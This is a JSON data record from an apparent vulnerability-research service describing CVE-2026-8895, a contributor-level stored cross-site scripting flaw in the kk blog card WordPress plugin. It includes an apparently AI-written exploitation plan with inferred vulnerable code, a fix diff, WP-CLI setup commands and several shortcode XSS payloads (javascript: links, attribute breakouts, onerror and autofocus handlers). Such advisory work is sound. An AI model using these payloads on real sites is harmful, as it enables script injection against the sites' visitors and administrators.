[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fXT2pT46L4hY0rXO6pXnourWryOL8ggH51OakrlqH3Ig":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-8895","kk-blog-card-authenticated-contributor-stored-cross-site-scripting-via-shortcode-attributes","kk blog card \u003C= 1.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes","The kk blog card plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'blog-card' shortcode in all versions up to, and including, 1.3. This is due to insufficient input sanitization and output escaping on the shortcode's 'href' and 'type' attributes, which are concatenated directly into HTML attribute contexts in the shortcode callback registered in kk-blog-card-shortcode.php. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","kk-blog-card",null,"\u003C=1.3","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-06-08 15:07:46","2026-06-09 03:41:24",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ff6ccddd4-89fe-4786-917b-944185b4510b?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-8895 (kk blog card)\n\n## 1. Vulnerability Summary\nThe **kk blog card** plugin (\u003C= 1.3) is vulnerable to **Authenticated (Contributor+) Stored Cross-Site Scripting (XSS)**. The vulnerability resides in the shortcode handler for `[blog-card]`, specifically within the file `kk-blog-card-shortcode.php`. The plugin fails to sanitize or escape the `href` and `type` attributes before concatenating them into the HTML output returned by the shortcode callback. Since Contributors can create posts and embed shortcodes, they can inject malicious scripts that execute in the context of any user (including administrators) viewing the affected post.\n\n## 2. Attack Vector Analysis\n*   **Shortcode:** `[blog-card]`\n*   **Vulnerable Attributes:** `href` (injected into `\u003Ca>` tags) and `type` (likely injected into a class or data attribute).\n*   **Authentication Level:** Contributor or higher.\n*   **Preconditions:** The plugin must be active. The attacker needs the ability to save a post or page containing a shortcode.\n*   **Vector:** The payload is delivered via the shortcode attributes within the post content.\n\n## 3. Code Flow\n1.  **Registration:** The plugin registers the shortcode in the main plugin file or an init hook:\n    `add_shortcode('blog-card', 'kk_blog_card_render_callback');` (inferred function name).\n2.  **Entry Point:** When a post is rendered, WordPress parses `[blog-card href=\"ATTACKER_INPUT\" type=\"ATTACKER_INPUT\"]`.\n3.  **Processing:** The callback in `kk-blog-card-shortcode.php` receives the `$atts` array.\n4.  **Vulnerable Logic (Sink):** \n    The code likely resembles the following (based on the vulnerability description):\n    ```php\n    \u002F\u002F kk-blog-card-shortcode.php\n    function kk_blog_card_render_callback($atts) {\n        $a = shortcode_atts(array(\n            'href' => '',\n            'type' => 'default',\n        ), $atts);\n        \n        \u002F\u002F VULNERABILITY: Direct concatenation without esc_url() or esc_attr()\n        $output = '\u003Cdiv class=\"kk-blog-card ' . $a['type'] . '\">';\n        $output .= '\u003Ca href=\"' . $a['href'] . '\">...\u003C\u002Fa>';\n        return $output;\n    }\n    ```\n5.  **Output:** The unescaped HTML string is returned to WordPress and printed on the page.\n\n## 4. Nonce Acquisition Strategy\nThis is a **Stored XSS** via shortcode, which means the attack occurs during the **post-saving** process. \n*   In a real-world scenario, a Contributor would need a nonce to save a post through the WordPress Dashboard.\n*   For an automated PoC, the most reliable way to inject the payload is to use **WP-CLI** to create the post directly. This bypasses the need for UI-level nonces and focuses on the rendering vulnerability.\n*   **Note:** The shortcode rendering itself (on the frontend) does **not** require a nonce.\n\n## 5. Exploitation Strategy\nThe goal is to demonstrate script execution by breaking out of the HTML attributes.\n\n### Step 1: Inject via `href`\nThe `href` attribute is a classic sink for `javascript:` protocol payloads.\n*   **Payload:** `[blog-card href=\"javascript:alert('XSS_HREF')\"]`\n\n### Step 2: Inject via `type`\nThe `type` attribute is likely placed inside a class or a quoted attribute. We will use a breakout payload.\n*   **Payload:** `[blog-card type='\">\u003Cscript>alert(\"XSS_TYPE\")\u003C\u002Fscript>']`\n\n### HTTP Request (Verification)\nAfter creating the post, the agent should fetch the post's permalink.\n*   **Tool:** `http_request`\n*   **Method:** `GET`\n*   **URL:** The permalink of the post created in the setup phase.\n*   **Expected Response:** 200 OK.\n\n## 6. Test Data Setup\n1.  **Install Plugin:** Ensure `kk-blog-card` version 1.3 or lower is installed and activated.\n2.  **Create Contributor:**\n    `wp user create attacker attacker@example.com --role=contributor --user_pass=password`\n3.  **Create Malicious Post:**\n    Use WP-CLI to create a post containing the payload:\n    ```bash\n    wp post create --post_type=post --post_title=\"Security Test\" --post_status=publish --post_content='[blog-card href=\"javascript:alert(1)\" type=\"\\\" onmouseover=\\\"alert(2)\\\" data-x=\\\"\"]' --user=attacker\n    ```\n\n## 7. Expected Results\n*   When viewing the post HTML source, the `\u003Ca>` tag should appear exactly as:\n    `\u003Ca href=\"javascript:alert(1)\">`\n*   The div or container should contain the injected attribute:\n    `\u003Cdiv class=\"kk-blog-card \" onmouseover=\"alert(2)\" data-x=\"\">` (or similar, depending on the exact concatenation logic).\n*   If the browser executes the page, the alerts should trigger.\n\n## 8. Verification Steps\n1.  **Verify Storage:**\n    `wp post get [ID] --field=post_content`\n2.  **Verify Rendering:**\n    Use the `http_request` tool to fetch the page and grep for the raw payload:\n    `grep \"javascript:alert(1)\"`\n    `grep \"onmouseover=\\\"alert(2)\\\"\"`\n\n## 9. Alternative Approaches\nIf the `href` attribute is partially sanitized (e.g., stripping `javascript:`), focus entirely on the `type` attribute for attribute breakout:\n*   **Payload:** `[blog-card type='x\" onfocus=\"alert(1)\" autofocus=\"true\"']` (This triggers without user interaction).\n*   **Payload:** `[blog-card type='x\">\u003Cimg src=x onerror=alert(1)>']` (Standard tag breakout).\n\nIf the shortcode requires specific keys in the `$atts` array to even trigger the callback, examine `kk-blog-card-shortcode.php` for `empty()` checks on other attributes like `title` or `image`.","The kk blog card plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'blog-card' shortcode attributes 'href' and 'type' in versions up to 1.3. This occurs because the plugin fails to sanitize or escape these attributes before outputting them into HTML, allowing authenticated contributors to execute arbitrary scripts in the context of other users.","\u002F* kk-blog-card-shortcode.php *\u002F\nfunction kk_blog_card_render_callback($atts) {\n    $a = shortcode_atts(array(\n        'href' => '',\n        'type' => 'default',\n    ), $atts);\n    \n    \u002F\u002F VULNERABILITY: Direct concatenation without esc_url() or esc_attr()\n    $output = '\u003Cdiv class=\"kk-blog-card ' . $a['type'] . '\">';\n    $output .= '\u003Ca href=\"' . $a['href'] . '\">...\u003C\u002Fa>';\n    return $output;\n}","--- kk-blog-card-shortcode.php\n+++ kk-blog-card-shortcode.php\n@@ -6,8 +6,8 @@\n         'type' => 'default',\n     ), $atts);\n     \n-    $output = '\u003Cdiv class=\"kk-blog-card ' . $a['type'] . '\">';\n-    $output .= '\u003Ca href=\"' . $a['href'] . '\">...\u003C\u002Fa>';\n+    $output = '\u003Cdiv class=\"kk-blog-card ' . esc_attr($a['type']) . '\">';\n+    $output .= '\u003Ca href=\"' . esc_url($a['href']) . '\">...\u003C\u002Fa>';\n     return $output;\n }","An authenticated attacker with Contributor-level access or higher can create a new post and embed the [blog-card] shortcode. By setting the 'href' attribute to a 'javascript:' payload or using the 'type' attribute to perform an HTML attribute breakout (e.g., using quotes and event handlers like 'onmouseover'), the attacker can inject malicious scripts. These scripts execute in the browser of any user, including administrators, who views the published post.","gemini-3-flash-preview","2026-06-26 02:00:35","2026-06-26 02:01:09",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fkk-blog-card\u002Ftags"]